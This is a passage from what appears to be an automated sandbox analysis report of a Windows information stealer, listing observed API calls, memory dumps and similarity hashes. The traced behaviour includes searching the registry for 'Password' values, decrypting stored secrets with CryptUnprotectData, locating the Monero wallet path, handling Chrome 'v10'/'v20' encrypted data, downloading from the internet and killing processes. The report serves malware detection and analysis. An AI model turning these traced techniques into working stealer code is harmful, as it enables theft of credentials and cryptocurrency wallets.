                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: c4db8e190d7da0fab99650982212629967504bad9b3fa1d7b8df32ec8cd6a6fb
                            • Instruction ID: d2b1621d7165fed935d070951cd041cf572567368d4ca4e389f31769e1509654
                            • Opcode Fuzzy Hash: c4db8e190d7da0fab99650982212629967504bad9b3fa1d7b8df32ec8cd6a6fb
                            • Instruction Fuzzy Hash: EA415C71A00225ABDB21DB64EC45FAE77ACAB48705F004554FA05E72E0EB70AE548BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012BC1F
                            • lstrlen.KERNEL32(00000000), ref: 0012BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012BCAC
                            • lstrlen.KERNEL32(00154ADC), ref: 0012BD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: a79efed25a294ed10ea46443c25b411829e996eda152ddd969cef77e51dc951e
                            • Instruction ID: b0bcfb43bcbbcc8bd1194b5d11757e8b99f2618e22fd4474b8aca5fe54542e18
                            • Opcode Fuzzy Hash: a79efed25a294ed10ea46443c25b411829e996eda152ddd969cef77e51dc951e
                            • Instruction Fuzzy Hash: 4CA1B230A05225DFCB25DF68F98ABAEB7F4AF44309F188169E805DB661DB31DC61CB50
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 0014613A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00146159
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00146224
                            • memmove.MSVCRT(00000000,00000000,?), ref: 001462AF
                            • std::_Xinvalid_argument.LIBCPMT ref: 001462E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 0ade17afe72b39002d839f3d465ab547ee246e35f495b307b9cef851e70ee1ae
                            • Instruction ID: 990af7afd964637d2662a4c5d8cc008b542b04b539d3fc9eefedea8b1e84c946
                            • Opcode Fuzzy Hash: 0ade17afe72b39002d839f3d465ab547ee246e35f495b307b9cef851e70ee1ae
                            • Instruction Fuzzy Hash: C6615F70B00204EBDB18CF9CCCE5D6EB7B6EF96708B254919E492877A1D770AD808796
                            APIs
                            • memset.MSVCRT ref: 0014472A
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00135099), ref: 00144755
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0014475C
                            • wsprintfW.USER32 ref: 0014476B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 001447DA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 001447E9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 001447F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID: %hs
                            • API String ID: 3729781310-2783943728
                            • Opcode ID: 782d5f3c68da43d376f3d0c46a0656f766a7cea65364b78cea5e8d6cbbb01d50
                            • Instruction ID: 3c11b0d965da6cf3d7bb320d2d0bdcc7d4c87f2e94996baf21306f3f697933dd
                            • Opcode Fuzzy Hash: 782d5f3c68da43d376f3d0c46a0656f766a7cea65364b78cea5e8d6cbbb01d50
                            • Instruction Fuzzy Hash: D8317171A10305BBDB11DBE4EC85FDEB77CAF49702F104055FA05E71A0DB70AA418BA5
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E24F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E25D
                            • lstrcat.KERNEL32(?,?), ref: 0013E278
                            • lstrcat.KERNEL32(?,?), ref: 0013E28C
                            • lstrcat.KERNEL32(?,013EB850), ref: 0013E2A0
                            • lstrcat.KERNEL32(?,?), ref: 0013E2B4
                            • lstrcat.KERNEL32(?,013FD998), ref: 0013E2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013E306
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 00b3cffeb69dc64e8d562f7cb2ed1fea47917931d81ef310f79c2b993aad71e3
                            • Instruction ID: da1ea6db77ead5336bac805caeeea4f3070833cb27368133d878b2936df3581a
                            • Opcode Fuzzy Hash: 00b3cffeb69dc64e8d562f7cb2ed1fea47917931d81ef310f79c2b993aad71e3
                            • Instruction Fuzzy Hash: 6E41907191023CEBCB26EB64EC45ADD73B8BF58310F004AA5F50A93294DB309F858F90
                            APIs
                              • Part of subcall function 001277D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00127805
                              • Part of subcall function 001277D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0012784A
                              • Part of subcall function 001277D0: StrStrA.SHLWAPI(?,Password), ref: 001278B8
                              • Part of subcall function 001277D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 001278EC
                              • Part of subcall function 001277D0: HeapFree.KERNEL32(00000000), ref: 001278F3
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 00127A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00127ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00127ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00127AF0
                            • wsprintfA.USER32 ref: 00127B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00127B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00127B47
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 00127B60
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 6139abe4f1518a2f2714d4d2488dde9e2561a33ab68dc01696960fd4aa60cedc
                            • Instruction ID: 07ac56bf8fa322f9494315384800a66ef72e25d21d080cc3e2e03340f58e4852
                            • Opcode Fuzzy Hash: 6139abe4f1518a2f2714d4d2488dde9e2561a33ab68dc01696960fd4aa60cedc
                            • Instruction Fuzzy Hash: 3B31B872A04324EFCB11DFA8FC45AAFB77DEB84711F144519E906A3290DB70E955CB90
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 0013834C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138383
                            • lstrlen.KERNEL32(00000000), ref: 001383A0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001383D7
                            • lstrlen.KERNEL32(00000000), ref: 001383F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013842B
                            • lstrlen.KERNEL32(00000000), ref: 00138448
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138477
                            • lstrlen.KERNEL32(00000000), ref: 00138491
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001384C0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 425bb85fce9fd64b3c7911067fdb79c7a97b3ddd586fc0997bc858f591aace60
                            • Instruction ID: 3be22005f440400a4d7d2e976d19f1ba3dbf8db687e37dd8d41797bdc905721e
                            • Opcode Fuzzy Hash: 425bb85fce9fd64b3c7911067fdb79c7a97b3ddd586fc0997bc858f591aace60
                            • Instruction Fuzzy Hash: 6B512871901723ABDB159F68E848B6BB7A8EF14344F154514FC06EBA45EB30ED61CBE0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00127805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0012784A
                            • StrStrA.SHLWAPI(?,Password), ref: 001278B8
                              • Part of subcall function 00127750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012775E
                              • Part of subcall function 00127750: RtlAllocateHeap.NTDLL(00000000), ref: 00127765
                              • Part of subcall function 00127750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012778D
                              • Part of subcall function 00127750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 001277AD
                              • Part of subcall function 00127750: LocalFree.KERNEL32(?), ref: 001277B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001278EC
                            • HeapFree.KERNEL32(00000000), ref: 001278F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00127A35
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: 21bffbebd41f85848ea5543cd9edf618f99ad67782ec65ce64a11ecaad783e90
                            • Instruction ID: dc78eb81f93745f69d65988283f0e1b2a41112761b24abc1e101f75cfa226736
                            • Opcode Fuzzy Hash: 21bffbebd41f85848ea5543cd9edf618f99ad67782ec65ce64a11ecaad783e90
                            • Instruction Fuzzy Hash: F9712EB1D0021DEFDB10DF95DC80AEEB7B9EF58310F14456AE509A7250EB356A89CB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00121135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0012113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00121159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00121173
                            • RegCloseKey.ADVAPI32(?), ref: 0012117D
                            Strings
                            • wallet_path, xrefs: 0012116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 0012114F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 738e7163812e8cf11f8f37c570fc4c5305014735d9e2f13cad6cb6a3cff09898
                            • Instruction ID: 87105dd997cf63a422cb5c1bab840b6f0a60d301c55569c0e4bac4af537a9f85
                            • Opcode Fuzzy Hash: 738e7163812e8cf11f8f37c570fc4c5305014735d9e2f13cad6cb6a3cff09898
                            • Instruction Fuzzy Hash: 83F09075640308FBD7019BA4AC4DFAB7B3CEB08716F000055FF04E6290D6B05A4487A0
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00129E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00129E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00129EA7
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • lstrcpy.KERNEL32(00000000,00151C80), ref: 00129FB2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 102c3305fd08351fa8ee434de8ec93bbeb9351df0ea875d291e70ad841dc16cf
                            • Instruction ID: 71f31cdb646025ecc4a7a4b39eb7d7fe5b36bac4104b0dde74fac263d1aae542
                            • Opcode Fuzzy Hash: 102c3305fd08351fa8ee434de8ec93bbeb9351df0ea875d291e70ad841dc16cf
                            • Instruction Fuzzy Hash: 7151F331A10229ABCB10EF68EC42B9E7BB8EF60315F150124FD09EB651DB70ED658BD0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00125661
                            • InternetOpenA.WININET(0014CFF4,00000000,00000000,00000000,00000000), ref: 00125677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00125692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 001256BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 001256E1
                            • InternetCloseHandle.WININET(?), ref: 001256FA
                            • InternetCloseHandle.WININET(00000000), ref: 00125701
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same sixteen associated dumps as listed above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 328c86b24fa73ae3c2e62a44c4b285da920f14fe30b9efce780af84568167a04
                            • Instruction ID: dcf12e578453711111bb744f6451805ccd97dbe3cdabcf5952009ec2497f1feb
                            • Opcode Fuzzy Hash: 328c86b24fa73ae3c2e62a44c4b285da920f14fe30b9efce780af84568167a04
                            • Instruction Fuzzy Hash: 4B41A270A40715EFDB15CF54EC88FAAB7B9FF48305F5480A9E9089B2A1D7719941CF90
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00144969
                            • Process32First.KERNEL32(00000000,00000128), ref: 00144979
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014498B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001449AC
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 001449BB
                            • CloseHandle.KERNEL32(00000000), ref: 001449C2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 001449D0
                            • CloseHandle.KERNEL32(00000000), ref: 001449DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: f74d876d3e7361931601dd36656807e553e6311a8de81e6b733164c87a727179
                            • Instruction ID: 6650eb7a7d8e37de5ba1d9b98c357f41e0c19fdefddfa68dd8651ddfaa317754
                            • Opcode Fuzzy Hash: f74d876d3e7361931601dd36656807e553e6311a8de81e6b733164c87a727179
                            • Instruction Fuzzy Hash: 56019E71601318ABEB225B20EC89FEB777CEB0C756F000581F949E21B0EF749D908AA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E727
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0012E7BA
                            • FindClose.KERNEL32(00000000), ref: 0012E7C9
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction ID: 56d4ae3bb10147b5d59eebde005d892a01f6b0c70f5efeb89a69276c81cc321d
                            • Opcode Fuzzy Hash: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction Fuzzy Hash: 7B020A70A01221CFDB68CF19E594B25B7E5BF44719B19C0AED8499B3A2D772EC92CF40
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138575
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001385AC
                            • lstrlen.KERNEL32(00000000), ref: 001385F2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138629
                            • lstrlen.KERNEL32(00000000), ref: 0013863F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013866E
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 0013867E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 1f629629997faf382019afc9715b30159206f1d3f42087b766d77df04a14ec7f
                            • Instruction ID: 45d8a1f60c2476a17331cdd72ea71dad35ec20b272d1bfc0c555d6a5d0a2b152
                            • Opcode Fuzzy Hash: 1f629629997faf382019afc9715b30159206f1d3f42087b766d77df04a14ec7f
                            • Instruction Fuzzy Hash: AB51ABB19002129FDB24DF69D899A9ABBF8EF88304F248459FC86DB255EF34D941CB50
                            APIs
